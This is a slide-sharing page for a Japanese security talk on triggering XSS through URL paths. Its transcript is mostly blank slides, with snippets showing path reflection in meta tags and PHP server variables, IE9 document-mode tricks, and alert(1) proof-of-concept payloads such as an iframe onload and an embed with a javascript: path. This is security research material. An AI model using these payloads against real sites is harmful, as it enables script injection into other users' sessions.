Upgrade to Pro — share decks privately, control downloads, hide ads and more …

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Masato Kinugawa
March 29, 2016
Technology
14
24k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.8k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
83k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
18k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.6k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
24k
USAGE OF XSS FILTER
masatokinugawa
4
2.4k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
masatokinugawa
7
2.6k

Other Decks in Technology

See All in Technology
OpenShift.Run2023_create-aro-with-terraform
ishiitaiki20fixer
1
160
re:Inventで発表があったIoT事例の紹介と考察
kizawa2020
0
150
Kaggleシミュレーションコンペの動向
nagiss
0
230
Astroで始める爆速個人サイト開発
takanorip
12
8.4k
400種類のWeb APIをサポートしているデータパイプラインツールにおけるWeb APIとの共存戦略
cdataj
0
150
Airdrop for Open Source Projects
epicsdao
0
290
OCI DevOps 概要 / OCI DevOps overview
oracle4engineer
PRO
0
470
Hasuraの本番運用に向けて
nori3tsu
0
280
PHPのimmutable arrayとは
hnw
1
140
プログラミング支援AI GitHub Copilot すごいの話
moyashi
0
280
OVN-Kubernetes-Introduction-ja-2023-01-27.pdf
orimanabu
1
230
USB PD で迎える AC アダプター大統一時代
puhitaku
2
1.5k

Featured

See All Featured
jQuery: Nuts, Bolts and Bling
dougneiner
57
6.6k
How to Ace a Technical Interview
jacobian
270
21k
A Modern Web Designer's Workflow
chriscoyier
689
180k
The Invisible Customer
myddelton
113
12k
How to name files
jennybc
47
73k
Reflections from 52 weeks, 52 projects
jeffersonlam
338
18k
Building Flexible Design Systems
yeseniaperezcruz
314
35k
Documentation Writing (for coders)
carmenintech
51
2.9k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
From Idea to $5000 a Month in 5 Months
shpigford
374
44k
Making Projects Easy
brettharned
102
4.8k
Designing with Data
zakiwarfel
91
4.2k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None